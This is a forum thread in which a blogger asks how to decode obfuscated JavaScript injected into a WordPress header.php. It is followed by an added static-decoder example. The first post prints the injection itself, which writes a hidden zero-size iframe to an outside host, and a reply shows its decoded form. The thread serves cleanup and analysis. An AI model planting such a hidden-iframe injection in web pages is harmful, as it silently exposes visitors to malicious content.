JavaScript injection on header.php

Discussion in 'Blogging' started by stream, Jul 8, 2010.

  1. stream

    Hey guys,

    I got a JS injection on some of my blogs.
    Maybe my WP was too outdated and the attacker could inject the code. The injection reads like this:

    Code:
    <script type="text/javascript">var _0x260c=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x32\x2E\x73\x70\x62\x2E\x72\x75\x2F\x73\x63\x72\x69\x70\x74\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];document[_0x260c[0x1]](_0x260c[0x0]);</script>
    How can I decode it?
     
  2. yeahright

    It decodes to:
    HTML:
    <iframe src="http://ad2.spb.ru/script/in.cgi?default" width="0" height="0" frameborder="0"></iframe>
    Just use something like Firebug for Firefox or Chrome's built-in developer tools to see what the JavaScript outputs.
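Added example, not part of the original thread: the decoding can also be done statically, so the injected script never has to run in a browser. The sketch below pulls the string literals out of the script body, decodes their \xNN escapes and flags zero-sized iframes; the sample input is constructed (example.invalid host, same shape as the posted snippet) and all function names are this example's own.

```javascript
// Static decoder: the suspicious script is only parsed as text, never evaluated.
// SAMPLE is a constructed input with the same structure as the injection in the post.
const SAMPLE =
  String.raw`var _0xabc=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22` +
  String.raw`\x68\x74\x74\x70\x3A\x2F\x2F` +
  String.raw`\x65\x78\x61\x6D\x70\x6C\x65\x2E\x69\x6E\x76\x61\x6C\x69\x64\x2F\x78` +
  String.raw`\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22` +
  String.raw`\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x3E` +
  String.raw`\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];` +
  String.raw`document[_0xabc[0x1]](_0xabc[0x0]);`;

const SIMPLE = { n: "\n", r: "\r", t: "\t" };

// Decode \xNN and \uNNNN escapes; other backslash escapes map to the escaped char.
function decodeEscapes(body) {
  return body.replace(
    /\\(?:x([0-9A-Fa-f]{2})|u([0-9A-Fa-f]{4})|(.))/g,
    (_, hex, uni, ch) =>
      hex || uni ? String.fromCharCode(parseInt(hex || uni, 16)) : SIMPLE[ch] || ch
  );
}

// Extract every single- or double-quoted literal from the source and decode it.
function extractStrings(source) {
  const literal = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  const out = [];
  for (const m of source.matchAll(literal)) {
    out.push(decodeEscapes(m[1] !== undefined ? m[1] : m[2]));
  }
  return out;
}

// Report iframes in the decoded strings and whether they are sized to be invisible.
function findHiddenIframes(strings) {
  const findings = [];
  for (const s of strings) {
    for (const [tag] of s.matchAll(/<iframe\b[^>]*>/gi)) {
      const attr = (name) => {
        const m = tag.match(new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]*)`, "i"));
        return m ? m[1] : null;
      };
      const hidden = attr("width") === "0" || attr("height") === "0";
      findings.push({ src: attr("src"), hidden });
    }
  }
  return findings;
}

const decoded = extractStrings(SAMPLE);
console.log(decoded);
console.log(findHiddenIframes(decoded));
```

Run it with Node and paste the script body from the infected file in place of SAMPLE; the printed src is the host to search for in other theme files and to block.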
  3. stream

    Thanks, yeahright!